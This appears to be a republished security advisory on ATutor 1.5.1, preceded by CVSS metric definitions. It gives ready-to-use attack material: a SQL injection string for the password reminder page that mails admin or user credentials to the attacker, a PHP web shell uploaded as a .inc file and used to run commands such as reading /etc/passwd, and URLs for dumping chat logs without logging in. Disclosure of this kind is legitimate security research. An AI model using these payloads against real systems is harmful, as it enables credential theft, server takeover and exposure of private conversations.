The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
High
PR
The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
ATUTOR 1.5.1 (possibly prior versions)
SQL INJECTION / ADMIN & USERS CREDENTIALS DISCLOSURE / INFORMATION DISCLOSURE /
USER IMPERSONATION / REMOTE CODE EXECUTION
software:
site: http://www.atutor.ca/
description: "ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with
accessibility and adaptability in mind. Administrators can install or update ATutor in minutes, and
develop custom templates to give ATutor a new look. Educators can quickly assemble, package, and redistribute
Web-based instructional content, easily retrieve and import prepackaged content, and conduct their courses online.
Students learn in an adaptive learning environment."
a) if magic_quotes_gpc is off in php.ini - > SQL INJECTION
without to have an user account, you can use password remider to send yourself admin
login & password, no need for exploit code:
go to http://[target]/[path]/password_reminder.php
and in the email field type:
' UNION SELECT login, password, 'your_email (at) domain (dot) com [email concealed]' FROM AT_admins /*
look at the vulnerable code in password_reminder.php:
...
$sql="SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE email='$_POST[form_email]'";
$result = mysql_query($sql,$db);
if ($row = mysql_fetch_assoc($result)) {
$r_login = $row['login'];
$r_passwd= $row['password'];
$r_email = $row['email'];
$tmp_message = _AT(array('password_request2',$_base_href))."nn";
$tmp_message .= _AT('web_site').' : '.$_base_href."n";
$tmp_message .= _AT('login_name').' : '.$r_login."n";
$tmp_message .= _AT('password').' : '.$r_passwd."n";
require(AT_INCLUDE_PATH . 'classes/phpmailer/atutormailer.class.php');
$mail = new ATutorMailer;
$mail->From = EMAIL;
$mail->AddAddress($r_email);
$mail->Subject = SITE_NAME . ': ' . _AT('password_reminder');
$mail->Body = $tmp_message;
if(!$mail->Send()) {
//echo 'There was an error sending the message';
$msg->printErrors('SENDING_ERROR');
exit;
}
$msg->addFeedback('PASSWORD_SUCCESS');
...
$_POST[form_email] is not filtered in any way as you can see, so the query become:
SELECT login, password, email FROM AT_members WHERE email='' UNION SELECT login, password, 'your_email (at) domain (dot) com [email concealed]' FROM AT_admins /*'
/* are the Mysql comment chars so this is a valid query
$r_login and $r_passord are admin user & passord but $r_email is yours! ;)
also, you can have the password of any user typing:
' UNION SELECT login, password, 'your_email (at) domain (dot) com [email concealed]' FROM AT_members where login='user_whom_you_want_the_password' /*
if you want to see if your course server is vulnerable just type ' in email field, you will have an error like this:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
[pathto]/password_reminder.php on line 27
if not, you will see a message like this:
The following errors occurred:
* No account found with that email address.
b) after you have your stealed admin or educator account (yes, an educator can upload xecutable files :) )
you can execute arbitrary commands on target system uploading an .inc file (this extension is not checked)
with php code inside, example:
<?php error_reporting(0); system($HTTP_GET_VARS[cmd]; ?>
then you can launch commands, example:
http://[target]/[path]/atutor/content/2/cmd.inc?cmd=cat%20/etc/passwd
(usually upload dir is 'content' if admin do not change it, and subdir is numbered by the time registration
of user, you can quickly bruteforce the url manually)
look at the list of illegal extensions in config.inc.php:
...
/* Illegal file types, by extension. Include any extensions */
/* you do not want to allow for uploading. (Just the extention */
/* without the leading dot.) */
$IllegalExtentions = array('exe','asp','php','php3','bat','cgi','pl','com','vbs','reg','pcd',
'pif','scr','bas','inf','vb','vbe','wsc','wsf','wsh');
...
but where are .inc, .php4, .phtml, .html, .pwml and so on if you do not set?
should be better to setup which kind of files you CAN upload...
c) without have an account a user can read chat conversation without to be logged in, making GET requests for
chat temporary files:
example:
http://[target]/[path]/atutor/content/chat/2/msgs/1.message
http://[target]/[path]/atutor/content/chat/2/msgs/2.message
http://[target]/[path]/atutor/content/chat/2/msgs/3.message
ciclyng this GET requests a user can dump all chat archive
rgod
site: http://rgod.altervista.org
mail: retrogod [at] aliceposta.it
original advisory: http://rgod.altervista.org/atutor151.html
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum